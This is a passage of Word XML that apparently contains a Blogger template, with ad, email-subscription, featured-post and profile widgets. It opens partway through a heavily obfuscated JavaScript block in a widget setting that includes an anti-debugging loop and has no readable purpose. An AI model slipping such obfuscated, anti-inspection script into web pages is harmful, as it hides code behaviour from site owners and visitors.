_0x3849e0();},&amp;#39;\x43\x6a\x76\x6f\x52&amp;#39;:function(_0x27c478,_0x59eb98){return _0x27c478===_0x59eb98;},&amp;#39;\x48\x71\x67\x54\x4f&amp;#39;:function(_0x12f88d,_0x3a771f){return _0x12f88d(_0x3a771f);}};function _0x39aa84(_0x34673b){if(_0x46439c[&amp;#39;\x79\x4e\x58\x46\x59&amp;#39;](typeof _0x34673b,_0x46439c[_0x261f(&amp;#39;0x48&amp;#39;,&amp;#39;\x25\x5e\x55\x57&amp;#39;)])){return function(_0x2defd1){}[_0x261f(&amp;#39;0x49&amp;#39;,&amp;#39;\x4f\x6e\x66\x69&amp;#39;)](_0x46439c[_0x261f(&amp;#39;0x4a&amp;#39;,&amp;#39;\x39\x72\x68\x67&amp;#39;)])[_0x261f(&amp;#39;0x4b&amp;#39;,&amp;#39;\x6c\x42\x24\x49&amp;#39;)](_0x46439c[_0x261f(&amp;#39;0x4c&amp;#39;,&amp;#39;\x74\x55\x75\x4e&amp;#39;)]);}else{if(_0x46439c[&amp;#39;\x77\x44\x45\x6a\x59&amp;#39;](_0x46439c[_0x261f(&amp;#39;0x4d&amp;#39;,&amp;#39;\x5e\x39\x5a\x23&amp;#39;)](&amp;#39;&amp;#39;,_0x46439c[_0x261f(&amp;#39;0x4e&amp;#39;,&amp;#39;\x65\x7a\x70\x79&amp;#39;)](_0x34673b,_0x34673b))[_0x46439c[_0x261f(&amp;#39;0x4f&amp;#39;,&amp;#39;\x47\x44\x45\x24&amp;#39;)]],0x1)||_0x34673b%0x14===0x0){(function(){return!![];}[_0x261f(&amp;#39;0x50&amp;#39;,&amp;#39;\x41\x21\x63\x41&amp;#39;)](_0</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>x46439c[_0x261f(&amp;#39;0x51&amp;#39;,&amp;#39;\x5b\x43\x51\x73&amp;#39;)](_0x46439c[_0x261f(&amp;#39;0x52&amp;#39;,&amp;#39;\x77\x75\x78\x65&amp;#39;)],_0x46439c[_0x261f(&amp;#39;0x53&amp;#39;,&amp;#39;\x24\x34\x57\x70&amp;#39;)]))[_0x261f(&amp;#39;0x54&amp;#39;,&amp;#39;\x23\x4d\x26\x4b&amp;#39;)](_0x46439c[_0x261f(&amp;#39;0x55&amp;#39;,&amp;#39;\x25\x4f\x79\x73&amp;#39;)]));}else{(function(){return![];}[_0x261f(&amp;#39;0x56&amp;#39;,&amp;#39;\x32\x4c\x66\x32&amp;#39;)](_0x46439c[_0x261f(&amp;#39;0x57&amp;#39;,&amp;#39;\x24\x34\x57\x70&amp;#39;)]+_0x46439c[_0x261f(&amp;#39;0x58&amp;#39;,&amp;#39;\x7a\x4e\x52\x75&amp;#39;)])[_0x261f(&amp;#39;0x59&amp;#39;,&amp;#39;\x54\x71\x6b\x64&amp;#39;)](_0x46439c[_0x261f(&amp;#39;0x5a&amp;#39;,&amp;#39;\x38\x33\x25\x6b&amp;#39;)]));}}_0x46439c[_0x261f(&amp;#39;0x5b&amp;#39;,&amp;#39;\x40\x6e\x4e\x4f&amp;#39;)](_0x39aa84,++_0x34673b);}try{if(_0x72dc01){if(_0x46439c[_0x261f(&amp;#39;0x5c&amp;#39;,&amp;#39;\x21\x66\x44\x49&amp;#39;)](&amp;#39;\x51\x43\x5a\x6c\x48&amp;#39;,&amp;#39;\x6e\x4c\x72\x75\x74&amp;#39;)){_0x46439c[_0x261f(&amp;#39;0x5d&amp;#39;,&amp;#39;\x70\x61\x36\x42&amp;#39;)](_0x396060);}else{return _0x39aa84;}}else{_0x46439c[_0x261f(&amp;#39;0x5e&amp;#39;,&amp;#39;\x21\x66\x44\x49&amp;#39;)](_0x39aa84,0x0);}}catch(_0xad24d5){}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&amp;lt;/script&amp;gt;&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;!-- only display title if it's non-empty --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:if cond='data:title != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;h2 class='title'&gt;&lt;data:title/&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;div class='widget-content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;data:content/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:widget id='HTML4' locked='false' title='Advertisement' type='HTML' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='content'&gt;&lt;![CDATA[&lt;a href="javascript:;"&gt;&lt;img src="https://1.bp.blogspot.com/-jvZMGZAsCgs/XYWxGHrfnKI/AAAAAAAAAB8/A6eY3cvkYScLXkhw4fhAZ-xKfrvIcGvkgCLcBGAsYHQ/s320/ad.png "/&gt;&lt;/a&gt;]]&gt;&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;!-- only display title if it's non-empty --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:if cond='data:title != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;h2 class='title'&gt;&lt;data:title/&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div class='widget-content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;data:content/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:widget id='FollowByEmail2' locked='false' title='Follow by Email' type='FollowByEmail' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:if cond='data:title != &amp;quot;&amp;quot;'&gt;&lt;h2 class='title'&gt;&lt;data:title/&gt;&lt;/h2&gt;&lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div class='widget-content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;div class='follow-by-email-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;form action='https://feedburner.google.com/fb/a/mailverify' expr:onsubmit='&amp;quot;window.open(\&amp;quot;https://feedburner.google.com/fb/a/mailverify?uri=&amp;quot; + data:feedPath + &amp;quot;\&amp;quot;, \&amp;quot;popupwindow\&amp;quot;, \&amp;quot;scrollbars=yes,width=550,height=520\&amp;quot;); return true&amp;quot;' method='post' target='popupwindow'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;table width='100%'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;input class='follow-by-email-address' name='email' placeholder='Email address...' type='text'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                  &lt;td width='64px'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;input class='follow-by-email-submit' type='submit' value='Submit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;input expr:value='data:feedPath' name='uri' type='hidden'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;input name='loc' type='hidden' value='en_US'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;span class='item-control blog-admin'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:widget id='FeaturedPost1' locked='false' title='Featured Post' type='FeaturedPost' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showSnippet'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showPostTitle'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='postId'&gt;295576070904985468&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showFirstImage'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='useMostRecentPost'&gt;false&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;!-- Only display title if it's non-empty --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:if cond='data:title != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;h2 class='title'&gt;&lt;data:title/&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:include name='content'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div class='post-summary'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:if cond='data:showPostTitle and data:postTitle != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;h3&gt;&lt;a expr:href='data:postUrl'&gt;&lt;data:postTitle/&gt;&lt;/a&gt;&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:if cond='data:showSnippet and data:postSummary != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;data:postSummary/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:if cond='data:showFirstImage and data:postFirstImage != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;img class='image' expr:src='data:postFirstImage'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;style type='text/css'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          .image {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  &lt;b:widget id='Profile1' locked='false' title='About Me' type='Profile' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showaboutme'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showlocation'&gt;false&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:if cond='data:title != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;h2&gt;&lt;data:title/&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div class='widget-content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:if cond='data:team'&gt; &lt;!-- team blog profile --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:loop values='data:authors' var='i'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;li&gt;&lt;a class='profile-name-link g-profile' expr:href='data:i.userUrl' expr:style='&amp;quot;background-image: url(&amp;quot; + data:i.profileLogo + &amp;quot;);&amp;quot;'&gt;&lt;data:i.display-name/&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:else/&gt; &lt;!-- normal blog profile --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:if cond='data:photo.url != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;a expr:href='data:userUrl'&gt;&lt;img class='profile-img' expr:alt='data:messages.myPhoto' expr:height='data:photo.height' expr:src='data:photo.url' expr:width='data:photo.width'/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;dl class='profile-datablock'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;dt class='profile-data'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                &lt;a class='profile-name-link g-profile' expr:href='data:userUrl' expr:style='&amp;quot;background-image: url(&amp;quot; + data:profileLogo + &amp;quot;);&amp;quot;' rel='author'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
